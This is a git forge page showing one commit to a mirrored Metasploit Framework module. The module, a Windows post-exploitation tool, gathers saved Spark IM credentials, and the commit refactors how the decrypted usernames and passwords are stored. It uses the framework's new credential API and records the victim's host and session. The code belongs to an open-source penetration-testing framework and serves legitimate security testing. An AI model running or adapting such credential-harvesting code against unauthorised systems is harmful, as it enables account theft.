infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update spark_im to use the new cred API

bug/bundler_fix
wchen-r7 2015-06-02 12:16:07 -05:00
parent b837741b66
commit 28556ea6e2
1 changed files with 38 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
modules/post/windows/gather/credentials/spark_im.rb
View File

@ -49,30 +49,54 @@ class Metasploit3 < Msf::Post
password = ::Rex::Text.to_utf8(password) password = ::Rex::Text.to_utf8(password)
user, pass = password.scan(/[[:print:]]+/) user, pass = password.scan(/[[:print:]]+/)
cred_opts = {}
if pass.nil? or pass.empty? if pass.nil? or pass.empty?
print_status("Username found: #{user}, but no password") print_status("Username found: #{user}, but no password")
pass = '' cred_opts.merge!(user: user)
else else
print_good("Decrypted Username #{user} Password: #{pass}") print_good("Decrypted Username #{user} Password: #{pass}")
cred_opts.merge!(user: user, password: pass)
end end
store_creds(user, pass) cred_opts.merge!(
ip: client.sock.peerhost,
port: 5222,
service_name: 'spark'
)
report_cred(cred_opts)
end end
def store_creds(user, pass) def report_cred(opts)
if db service_data = {
report_auth_info( address: opts[:ip],
:host => client.sock.peerhost, port: opts[:port],
:port => 5222, service_name: opts[:service_name],
:ptype => 'password', protocol: 'tcp',
:sname => 'spark', workspace_id: myworkspace_id
:user => user, }
:pass => pass,
:duplicate_ok => true, credential_data = {
:active => true module_fullname: fullname,
post_reference_name: self.refname,
session_id: session_db_id,
origin_type: :session,
username: opts[:user],
private_type: :password
}.merge(service_data)
if opts[:password]
credential_data.merge!(
private_data: opts[:password],
) )
print_status("Loot stored in the db")
end end
login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::UNTRIED,
}.merge(service_data)
create_credential_login(login_data)
end end
# main control method # main control method